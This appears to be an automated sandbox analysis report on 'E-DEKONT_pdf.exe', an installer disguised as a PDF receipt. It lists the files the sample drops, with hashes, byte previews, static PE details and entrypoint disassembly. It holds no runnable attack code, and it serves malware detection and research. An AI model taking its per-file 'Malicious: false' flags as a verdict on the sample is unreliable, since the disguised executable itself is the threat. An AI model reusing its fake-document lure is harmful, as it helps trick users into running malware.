SHA-256:	76780B0399CABFC18FECF2B2C7E6FC92CC451A7EAA7AF61DF42C9071D865CFD0
SHA-512:	4C82046F104FC9586CA99CAADC046F0DDBC18E8E024F9C86E06CEC44D33A65299D41D39B091C88012753DF0CA86086D5E04EBDEE0CCB398B3984E8A0DB40B94B
Malicious:	false
Preview:	...........QQQQ.M.++++.......................%%%.gggggg..;.6.........z..111.$$..........w................n......a....................................__...........&&&..........."""""".....yyyy..m......<<.............................................................ddddddd.........vv....IIIII.............,.,,,,,.JJ..;........t...............xx.........LL.'.....................n...............,,.?......4.............................mmmmm.....5.................gg.b.......fff...................$..PP.>>.....................gg....6..............55...d......\.............@@.MM..........................[.................X..............`.......................,,.....333....................PPP.W......................^^^......i........]]..................mmm.........9.e................................qq........<...........T......`...............O........................h..............................z...................N.J.................D.............D......rrr................................a...

C:\Users\user\procharity\Anasarca\Uncompelled\Bendixs\Bavnene24\Punkerne\Zaffer\mail-mark-junk-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	256
Entropy (8bit):	6.751232891471444
Encrypted:	false
SSDEEP:	6:6v/lhPysEQVoBP6ift9B65yHZTtJM1wzsbp:6v/7ZVoJ6iZr/Jcwz+
MD5:	348FDF742C74D33D14BE9088EA09B8AB
SHA1:	1E85BB9ECAF5408F041C07576AB5D92DB6AF1ADD
SHA-256:	0E74FFD35CE31900A583BBA5015F5103B5914694C6C719917551EE9E249A992B
SHA-512:	794272DC3BFE16B9E93887475534B787E6231402BADF5ED37A62F11B6897F038D4C95C1E5414492F148A3FC27C5A5F7CDEB5E4B698B2A0F06EA6B89D06AA6D19
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...A..0.E..;...B........^.......4d..C $..a......0)......7......S.@.\K.%a."=.....p.. .x'.'..eF. ...6.6. .j.R....e..F....Z.8.....-....!...X.C8..HZ-.......&.......r...3..\|.Y..m._A?......IEND.B`.

C:\Users\user\procharity\Anasarca\Uncompelled\Bendixs\Bavnene24\Punkerne\Zaffer\nn.txt

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5987
Entropy (8bit):	5.010162330631242
Encrypted:	false
SSDEEP:	96:i6nJPNV5T7bR/eGswck/SZI9o7JZqXFwKwo/c5zJsJGYsJW8L/c1N7lHvGy/Ynxj:i8Pf5LleGshkaa9o77sFuo/iJsEYsfwq
MD5:	366B85BF575444D20944DB387F94564E
SHA1:	E93FB8C9AE5EA26EB5C128BE27869CF3D3CF8FE4
SHA-256:	E6922E17B7622361BC4D07E76874A919E3095B477ED008986B94F84A931CB22F
SHA-512:	19A7B5C8F4CE681092ED56C78D9DD6BB95367809DB78F905F357859DD797E7E04810B6F0441B3F5EA7E1BF53D4E06CE361400F6899D8A6A54BA4FC58F9D8E991
Malicious:	false
Preview:	.;!@Lang2@!UTF-8!..; 4.45 : Robert Gr.nning..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Norwegian Nynorsk..Norsk Nynorsk..401..OK..Avbryt........&Ja..&Nei..&Lukke..Hjelp....&Hald fram..440..Ja til &alt..N&ei til alt..Stopp..Start p. nytt..&Bakgrunn..&Forgrunn..&Pause..Sett p. pause..Er du sikker p. du vil avbryte?..500..&Fil..&Redigere..&Vis..F&avorittar..Verk&t.y..&Hjelp..540..&Opna..Opna &Inni..Opna &Utanfor..&Vis..&Redigere..Endra &namn..&Kopiere til.....&Flytt til.....&Slett..&Del opp fil.....Set saman filer.....&Eigenskapar..Ko&mmentar..Rekna ut kontrollnummer....Opprett mappe..Opprett fil..&Avslutta..600..&Merk alle..Fjern alle markeringar..&Omvendt markering..Marker.....Fjern markering.....Merk etter type..Fjern markering etter type..700..S&tore ikon..S&m. ikon..&Lista..&Detaljar..730..Assortert..Flat vising..&2 felt..&Verkt.ylinjer..Opna kjeldemappa..Opp eit niv...Mappelogg.....&Oppdatere..750..Arkiv verkt.ylinje..Standard verkt.ylinjer..Store knappar..Vis knappetekst

C:\Users\user\procharity\Anasarca\Uncompelled\Bendixs\Bavnene24\Punkerne\Zaffer\object-flip-vertical-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	902
Entropy (8bit):	4.394728085585905
Encrypted:	false
SSDEEP:	24:2dPnnxu3tlj01veUeqVbbKs8RNcsZin4N:cfnFvmqg/RK4N
MD5:	352D57619D95C2B9DCBF97F8856DE9F0
SHA1:	1FA41F676FD27250510F9E6220FBA96497E2DCD5
SHA-256:	ECCBB5E0444C96DD9109D3B3E700A46991BA5962C9AA7808D3072CF0F358FE42
SHA-512:	2C589563E4D01E1D2CC00032EB707C917D15207A206EFB1E113CB5F618B69EB8E4A012E3FED61D2E65F29E557DE15949587E022F737630E3F233B7B42A3B4D19
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 9 13 v -10 h -2 v 10 z m 0 0"/>. <path d="m 4 10 v 1 c 0 0.265625 0.09375 0.53125 0.28125 0.71875 l 3.71875 3.71875 s 2.480469 -2.480469 3.71875 -3.71875 c 0.1875 -0.1875 0.28125 -0.453125 0.28125 -0.71875 v -1 h -1 c -0.265625 0 -0.53125 0.09375 -0.71875 0.28125 l -2.28125 2.28125 l -2.28125 -2.28125 c -0.1875 -0.1875 -0.453125 -0.28125 -0.71875 -0.28125 z m 0 0"/>. <path d="m 4 6 v -1 c 0 -0.265625 0.09375 -0.53125 0.28125 -0.71875 l 3.71875 -3.71875 s 2.480469 2.480469 3.71875 3.71875 c 0.1875 0.1875 0.28125 0.453125 0.28125 0.71875 v 1 h -1 c -0.265625 0 -0.53125 -0.09375 -0.71875 -0.28125 l -2.28125 -2.28125 l -2.28125 2.28125 c -0.1875 0.1875 -0.453125 0.28125 -0.71875 0.28125 z m 0 0"/>. </g>.</svg>.

C:\Users\user\procharity\Anasarca\Uncompelled\Bendixs\Bavnene24\Punkerne\Zaffer\orientation-portrait-right-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	282
Entropy (8bit):	4.69381573476161
Encrypted:	false
SSDEEP:	6:tI9mc4slzc87E4Gu/TtRhror/cWfZknUi/sq/aYOWSaq5eKVyKG+Kb0/:t4C87E4Gqjhr2f2U9RVJaopj9A0/
MD5:	B7AB3B03153FB5BAC16C1EB9119D30AC
SHA1:	959CC02CDD6CEFD36FF6EA10D7F8766A55BEE838
SHA-256:	725D790B0DB6A4FAB758B3DE6BD33C0DF5E03ED53F0FE8C12109C0FDC8EBDB93
SHA-512:	CB1E2D6A6CCE78625BA8ACE9A9E06196E2A7719B1885D97991C2D7ABA5FBE4D8BCF8CE09F298A496394DC0011F0D02FE406796B69E9D106744031E480D1F0221
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="15.959"><path d="M13.032 2.166a1.11 1.11 0 00-1.113-1.113H4.073A1.11 1.11 0 002.96 2.166v11.738a1.11 1.11 0 001.113 1.113h7.846a1.11 1.11 0 001.113-1.113zm-3 5.842l-4.063 3.99v-8z" style="marker:none" fill="#474747"/></svg>

C:\Users\user\procharity\Anasarca\Uncompelled\Bendixs\Bavnene24\Punkerne\Zaffer\schema-639-5.json

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	768
Entropy (8bit):	4.258220287910593
Encrypted:	false
SSDEEP:	12:8gn24UmS5alzMF+Q+1qu9slRnCBslRjWnfmYbCNs6:zzS5a6+1qu+7CC7KfmYbCW6
MD5:	DF2EDC28F4E782013F9FE4CE33C2D1E2
SHA1:	414C12FAC69FF2942B3075996A8DB9D7BE9A30F6
SHA-256:	F829C652F0BDB6A5E9C8F4FD8A5E6AC5F1895F65969CDFC267276641673DE65A
SHA-512:	FCE05D6C10B28DC4E428171CE0E7D7BF929E81253641514B1A4AC61AACCF0CE51F406183A38DC33A8BBFF0B4762AB3B0375ECA36FB8DE998C50CBBBBF7076912
Malicious:	false
Preview:	{. "$schema": "http://json-schema.org/draft-04/schema#",.. "title": "ISO 639-5",. "description": "ISO 639-5 language family and groups codes",. "type": "object",.. "properties": {.."639-5": {. "type": "array",. "items": {. "type": "object",. "properties": {. "alpha_3": {. "description": "Three letter code of the language family or group",. "type": "string",. "pattern": "^[a-z]{3}$". },. "name": {. "description": "Name of the language family or group",. "type": "string",. "minLength": 1. }. },. "required": ["alpha_3", "name"],. "additionalProperties": false. }. }. },. "additionalProperties": false.}.

C:\Users\user\procharity\Anasarca\Uncompelled\Bendixs\Bavnene24\Punkerne\Zaffer\video-display-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	302
Entropy (8bit):	4.652009481705799
Encrypted:	false
SSDEEP:	6:tI9mc4slzcWER40iFb5YDCXEUV8iHYoF1vmP92PhOmlRn+1T7G+Kb0/:t4CDq0mbvnP4/PkJJRn+1T79A0/
MD5:	B52C16AE04F7DD29EE6209AB5904FC6C
SHA1:	DDDF7783BC653D119DC216F1D8EC2698B22E9059
SHA-256:	AEDC2A5578489B00C571C9E4A54E11E79AAB26D68C2BB0717105E1280E251A41
SHA-512:	35D5FBEFA0112490DD31F2765774F235C3794AFDD04A8DEC37B9480DE727ED996CE42BBD9E8C3B5669859D1C92405946DEDBFCA54BA7FDBE3CEEF7A91A87E4B7
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M3 1C1.338 1 0 2.338 0 4v7c0 1.662 1.338 3 3 3h10c1.662 0 3-1.338 3-3V4c0-1.662-1.338-3-3-3zm0 2h10c.554 0 1 .446 1 1v7c0 .554-.446 1-1 1H3c-.554 0-1-.446-1-1V4c0-.554.446-1 1-1zm5 13c3 0 4-1 4-1H4s1 1 4 1z" fill="#474747"/></svg>

C:\Users\user\procharity\Anasarca\Uncompelled\EBCDIC.map

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	768
Entropy (8bit):	3.186763197106263
Encrypted:	false
SSDEEP:	3:l/lllxmRGMFMLm/t5OAKmEe/lVtRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRf:xllHmRvspnWLIIRbRwmZYGDMZ2jwZ4
MD5:	FC2195CEA58424FA0F941E6BEEF00842
SHA1:	3167168558855B658D5349FE68DBD974146E23FA
SHA-256:	61CB160BEF793C65996AEDC7742B61BABF0F0EC8342CEA293992352897E96D74
SHA-512:	28C459EF4F164EBC060E1EF782D202CC9ABC490E12AA0946EE1925B705FEE66DBD2308737BFAC308706FDD7AE18166DF6355D506C369C276FDC2EE10138E21A7
Malicious:	false
Preview:	HWCM........EBCDIC..........................EBCDIC Character Set Mapping....................................................................................................BreakPoint Software, Inc.....................................................................................................................................................................................................................<.(.+.\|.&...................!.$.*.).;...-...................\|.'.%._.>.?...................\.:.#.@.'..."...a.b.c.d.e.f.g.h.i...............j.k.l.m.n.o.p.q.r...............~.s.t.u.v.w.x.y.z.............................................{.A.B.C.D.E.F.G.H.I.............}.J.K.L.M.N.O.P.Q.R.............\...S.T.U.V.W.X.Y.Z.............0.1.2.3.4.5.6.7.8.9.\|..........

C:\Users\user\procharity\Anasarca\Uncompelled\Injured\Velmagtsdagene.Fra

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	179453
Entropy (8bit):	4.604511784699079
Encrypted:	false
SSDEEP:	3072:7Zk9CV/0JuDbauvJHRTFXIFe/n7xEdSYjjdPxBw3qoZ:lkMXDbFvJx5Ie7I932qm
MD5:	0933666B1FAD66520375CF8AD7FC292B
SHA1:	DA34576AA64C9B500A846E5AEAB2A6056BEBEE13
SHA-256:	D707EC4725971179B763C556274D7E2ED33D9E7473D09B127A4CE2847FAAF289
SHA-512:	B0C99910A6BD3D1B4577FFC3F780D825A3070D37BAC962A699A5BC0ED4352E9535C9C50BF1A009F2EC4EA5C09CADF17A07AF3EFADE636CC2D92C198FF34DFA58
Malicious:	false
Preview:	....2......................................................fffff.gg.......#....S.......9......``...........n.............................................d........z...........=..KKK.........~...<<.......qq...NN....qq........>.&&. ........##.......U................UU.44...q.`.................RR.................................U.................8.....h..............????........gggggggg..............<<....~......uuuuuu......,...........x...........kk.........................&...............1...s............/...;.....1...........+.....G................vv.......................KKK.....................dd....nn............bb...w.s...............g................."....4.WW....................................m.cc...!...66.jjjjj..Q.*.U.@....cccc..........W.iiii.G......///....J.v..............000...//....................................[.....::....88888..............e..............S. ..............................k........t.......i.w.2........................................s....cccc........M.....

C:\Users\user\procharity\Anasarca\Uncompelled\Mors\edit-delete-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	306
Entropy (8bit):	7.043191953539302
Encrypted:	false
SSDEEP:	6:6v/lhPysvXxGjiybWfxa/ins2zt2chHNXgWB7WkgNOVp:6v/7PXsjZbWfsafzt2EHfaNO7
MD5:	B6CA93585199635C40D931A388646348
SHA1:	6C1D232639CE03FEE5631BE06A30625DE8F177D3
SHA-256:	9A0D13E272689C838840937ED6EE9ED4943808192C62168904CA1037A6D26D7B
SHA-512:	633FB0BFB87934E0B996A48122540D1DD702D148293D5390BDD9D320F41001D98C50EBF5158FAFCEEF554F28DEED1E72ABE86186B5159A7D142505867EA1ED45
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...1JCA....+."E...ha.i,<@ ...v..r)-r.-r.h...P.A_,.>.&.{Z........3;...0...x.-..w./.i.!^1j#W-.&.0\g......E.IH~..3<a.....U...D..r~...>M..(...c?....\|.V.P.....*.......>......(0...s....&^F..zH~.....5..C.E.,..b...M.E..AO=$.bu..R.N......w].n......IEND.B`.

C:\Users\user\procharity\Anasarca\Uncompelled\Mors\format-justify-right.png

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	267
Entropy (8bit):	7.025918549235305
Encrypted:	false
SSDEEP:	6:6v/lhPAkbXo76+uUuEOEH7MQkZoV2W2FN/B81QjY/cmtVp:6v/7dX8lCEH7WZoVq5BDjYZt7
MD5:	0F8289422978EAE1ED2243B10D59AAD9
SHA1:	DF216B3C2CB009CB8F7B002616A09B8D2D868EE8
SHA-256:	D0E9ED17E7A5E236CA5C29EA69E7399188874829CE21CC1FA6BD29031DA7E93F
SHA-512:	D3893E73C3EACEE6EFD7547A73F151E16EA1373FCE2AE11F4C1CAEF499C6365898AE24EAF10E180AC9E44265445089A8F8D4ED3ED341AD1FEDBCC0D139A634DD
Malicious:	false
Preview:	.PNG........IHDR................a....IDATx....AFQ...7.F.....r...oX${....m..O.,.P$.{...!..6.f...uu~=.9`hxP^Z].Q....f.g..)..0........m....{....zAWWg...o....S..,....Y5.0...ol.....e@).dB....n@....1...n...?.C.(...H..m..t...1.E1....?_...?... ..l-......;....A.....IEND.B`.

C:\Users\user\procharity\Anasarca\Uncompelled\Mors\format-text-strikethrough-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	154
Entropy (8bit):	5.814916572909568
Encrypted:	false
SSDEEP:	3:yionv//thPl9vt3lAnsrtxBlldM9zFarZMG4FdLiotoPykkmIn0YJg/S7Mguh1p:6v/lhPys38zFguFd+otYyHmWMrDp
MD5:	5536CE84283606FACBA0D9E8E338B027
SHA1:	08EE3DB8FE5D8CC251960BF74C35B4C5D83FEAE4
SHA-256:	2725BFB59850C31D112AB8813811BABCC6BFFCFA2774FE350F67B5BF4CEE34CA
SHA-512:	285DC55B4B063EA8EF8FC717B755C5A8867DC55CD32F1656D08475F680DE70A81651503DCDEA3C0B340433B3BE1D69947AC92CBA1C59062891E0CDCD690398E5
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d....QIDAT8.c`...?...........\.`..\..B.xJ..X.#..O.~&j..j....;v8.a1..t1..F...1@...r.....7.)7...r....IEND.B`.

C:\Users\user\procharity\Anasarca\Uncompelled\Redaktionschefen\Billedsider\Aggersunds\Eclogue\Green_Leaves_11.bmp

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	PNG image data, 110 x 110, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4912
Entropy (8bit):	7.940731187600188
Encrypted:	false
SSDEEP:	96:zTwrjw62P+q7p+VjgvwPSyiftpOne6ODppDFGWkTE:yw62Gq7CjuYSRtpz7DzDFGq
MD5:	1F54C868948D8B0E7D951FBC65F79F3A
SHA1:	C7D58E2F81931BF6708FD77E691A12D99E261765
SHA-256:	542B3FF955758661724B67B9FCACC77543170491B8170B60A770BBCB4D1889D0
SHA-512:	9C25670B5F1D19BC50D31BAB096361AA8163C68E53E12DCD0150E990598F171A74BE4E9D37831BF013FB8B24BBCF356DE11C097D32A1C228EF0C76D5B3C29692
Malicious:	false
Preview:	.PNG........IHDR...n...n.....I9......pHYs...a...a..?.i....IDATx...wT.y...'.).J.PB.....(.u@,.X(...D.....PP..)...B.-....t....xg.8u.NQ.73..=.......y..K./...'..}../...R.~..9A)...RhA)...RhA)...RhA)...RhA)...Rh.4..3..`...5{6jd.2.fkh.a.y.m........[.................<zB......nZl...\.Rp.-n....m...-.^..QB.....R.x..%.=...,(..9{.....@?..p%):...N.(.v..#........v.3..1jj?5.E.t=u_...mO.=....R...K......>......7..WW._].iu...._o.}.../...-.....pH.u. ...,...x.J;...sp.f...`....e..L.]. k....w..J.M...B. #sH.5f..9.c...Lir......A.{..._..1kg.....xf._....e..#_.Rr},...7Pmo..1H..N.RL...9..y.1M..z.+K.@6..S.\.\|..i.b\'.t.....q..z..BY.S.U'..... h.!".jG...<....(.{..\|._.5.W<5....g;..Y.F5/w...e.Y.{.D.....P..T...2{..W./.N.........?\|..._........N.,z..d..6....o....J9......\.".a.~.U...s.....Y.T+q.A:.Q.G.9....(.Y..9..?...\.^d]...9<.fz.$v../.c.p....-.=.z.[...k...-.....G..e<O....=r.=.5S.I..1..FJJ...:.@.Bd.b\|.f\|.FZ..K!$w...a.;.x......N...*.. ..b.....F.....\|L.=Z.c......mOu..j..

C:\Users\user\procharity\Anasarca\Uncompelled\Velocity\aedilic\Subanconeal\MapiProxy_InUse.dll

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20920
Entropy (8bit):	6.270129738401503
Encrypted:	false
SSDEEP:	384:35kgh9IGJLE8rIYcnuYPBkvDG/Ghu4aX9lw:pkM9IG9EWIYyusqDGehuDXvw
MD5:	22ACDFF46574615C4EBF05E223A15899
SHA1:	45A3ACFE2D98A8AED780F0A323DA8B2BE366D2B6
SHA-256:	3089869E2C5691A16E1CF677BAB0A9148B688FBC6B69BB9AF949DD5AC009B063
SHA-512:	9D689705A5737F557B8FCC84DB49E1B36EE8E527D8150DA5E8766BA50298CA0791224E90C7DADF9D930EFD4D0E113E387496F03F672C865E6A5785D12C7859BE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....#b.........."!................`................................................t....@A.........................'.......(..d....`..x............2.......p.......&..............................H&...............)...............................text...~........................... ..`.rdata..D.... ......................@..@.data........0.......$..............@....00cfg.......@.......&..............@..@.orpc...<....P.......(.............. ..`.rsrc...x....`.......*..............@..@.reloc.......p.......0..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\procharity\Anasarca\Uncompelled\Velocity\aedilic\Subanconeal\PangoOT-1.0.typelib

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1245
Entropy (8bit):	5.462849750105637
Encrypted:	false
SSDEEP:	24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
MD5:	5343C1A8B203C162A3BF3870D9F50FD4
SHA1:	04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
SHA-256:	DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
SHA-512:	E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
Malicious:	false
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

C:\Users\user\procharity\Anasarca\Uncompelled\Velocity\aedilic\Subanconeal\document-open-recent-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	856
Entropy (8bit):	5.104082637403519
Encrypted:	false
SSDEEP:	12:t4CP5GdKdj9xclSaRaUlYzXHnbt1tUg1yU2hz4AeWTjiu+1ITpLhz4AeWK:t4CBGMFklSelln4AeWoI9x4AeWK
MD5:	93721360A2E739317994A0478117B840
SHA1:	459A0D7C35526AD3E03BE62E41C2AC1BF2518F6A
SHA-256:	15322D905A2DA0DFC566C0A17E9CFB303F5EDCCDB97CF30970AAEF6249E3A67A
SHA-512:	9AEFEB4749652BD968AF4F5FB9009715E913848F8662DF54955B9D0A25AEC10F0FC6701D4E470E4C5DC2CAC3A28073DDA13E1BC57F32319D5ECF83DC588EEC62
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="Sans" fill="#474747"><path d="M8.487.02A7.492 7.492 0 001 7.507a7.492 7.492 0 007.487 7.486 7.492 7.492 0 007.486-7.486A7.492 7.492 0 008.487.02zm0 1.973A5.508 5.508 0 0114 7.507a5.508 5.508 0 01-5.513 5.513 5.508 5.508 0 01-5.514-5.513 5.508 5.508 0 015.514-5.514z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" overflow="visible"/><path d="M11.393 4.007a.5.5 0 00-.25.156L8.487 6.819 6.83 5.163a.5.5 0 10-.687.687l2 2a.5.5 0 00.687 0l3-3a.5.5 0 00-.437-.843z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" overflow="visible"/></g></svg>

C:\Users\user\procharity\Anasarca\Uncompelled\Velocity\aedilic\Subanconeal\document-revert-symbolic-rtl.svg

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1724
Entropy (8bit):	5.094381704348926
Encrypted:	false
SSDEEP:	24:t4CBGEAl+NHqIQhQyKbRAecFhBrNdaMPiKEyKbRAecFhBrNx0/BSOsJMgVMhK:giBQONtAecFZdvSNtAecFZwQNVz
MD5:	2A7EB5CC3003641B58D03005C96471BD
SHA1:	C535719015040A3F7E82D472BF257BC2D68B39B9
SHA-256:	36D6147B3C3724195745184B1D74C377F2466E82351DE3AF724A996DB4B41564
SHA-512:	9A0B03A3B13A75182EC9181FE1F0BCFDE10C95634B9657899C80D86D9D9C3CD01EB5C8512274FBDCF45EA7DA7437609F838DAEE1BDE6F72E64399321DF659077
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" fill="#2e3436"><path d="M3 1a1 1 0 00-1 1v5h2V3h5.586L12 5.414V14H5v2h8a1 1 0 001-1V5a1 1 0 00-.293-.707l-3-3A1 1 0 0010 1zm2 7c-1.333 0-2.275.814-2.645 1.553C1.986 10.29 2 11 2 11v5h2v-5s.014-.291.145-.553c.13-.261.188-.447.855-.447h4V8H8z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:normal;shape-padding:0;isolation:auto;mix-blend-mode:normal;solid-color:#000;solid-opacity:1" font-weight="400" font-family="sans-serif" overflow="visible" fill-rule="evenodd"/><path d="M7.707 6.293L6.293 7.707 7.586 9l-1.293 1.293 1.414 1.414L10.414 9z" style="line-height:normal;font-variant-ligatures:normal;fon

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.9434336215176025
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	E-DEKONT_pdf.exe
File size:	352508
MD5:	fe8637b7f28206897219305735fdc407
SHA1:	9aaa5209476907a311d9905ab0566aadd833be3b
SHA256:	28384833cb4f57932b5344a38245cc995941d7fcccc387a2ffa7f295c91108ac
SHA512:	9539220c2bc089d627e0cbfb58233f538b0582cde4d9bce958693e97346b5904cbe84e2c75f8374d1b5de22a932bf69dd3976d529b58badb7bbf3ab3db4cd21f
SSDEEP:	6144:H6+/tV8E/1E0OrEl4SrruvJp6SRaitECiNHITLVnxbSHl55HMlPLbQf:Pn8E/1EOl4aeJpFECy5Hl5WV8f
TLSH:	EA7412461A52CDEBC4B717368FB92B065EA9C85A7490131B2F753B08FF72086935F283
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..L@../O...@...c...@..+F...@..Rich.@..........PE..L.....Oa.................d....;.. ...3............@

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General

Entrypoint:	0x403390
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x614F9CAA [Sat Sep 25 22:03:22 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5f0c714c36e6cc016b3a1f4bc86559e4

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 00000220h
push esi
push edi
xor edi, edi
push 00008001h
mov dword ptr [ebp-10h], edi
mov dword ptr [ebp-04h], 0040A198h
mov dword ptr [ebp-08h], edi
mov byte ptr [ebp-0Ch], 00000020h
call dword ptr [004080B8h]
mov esi, dword ptr [004080BCh]
lea eax, dword ptr [ebp-000000C0h]
push eax
mov dword ptr [ebp-000000ACh], edi
mov dword ptr [ebp-2Ch], edi
mov dword ptr [ebp-28h], edi
mov dword ptr [ebp-000000C0h], 0000009Ch
call esi
test eax, eax
jne 00007F96B856C651h
lea eax, dword ptr [ebp-000000C0h]
mov dword ptr [ebp-000000C0h], 00000094h
push eax
call esi
cmp dword ptr [ebp-000000B0h], 02h
jne 00007F96B856C63Ch
movsx cx, byte ptr [ebp-0000009Fh]
mov al, byte ptr [ebp-000000ACh]
sub ecx, 30h
sub al, 53h
mov byte ptr [ebp-26h], 00000004h
neg al
sbb eax, eax
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-000000B0h], 02h
jnc 00007F96B856C634h
and byte ptr [ebp-26h], 00000000h
cmp byte ptr [ebp-000000ABh], 00000041h
jl 00007F96B856C623h
movsx ax, byte ptr [ebp-000000ABh]
sub eax, 40h
mov word ptr [ebp-2Ch], ax
jmp 00007F96B856C616h
mov word ptr [ebp-2Ch], di
cmp dword ptr [ebp-000000BCh], 0Ah
jnc 00007F96B856C61Ah
and word ptr [ebp+00000000h], 0000h

Rich Headers

Programming Language:

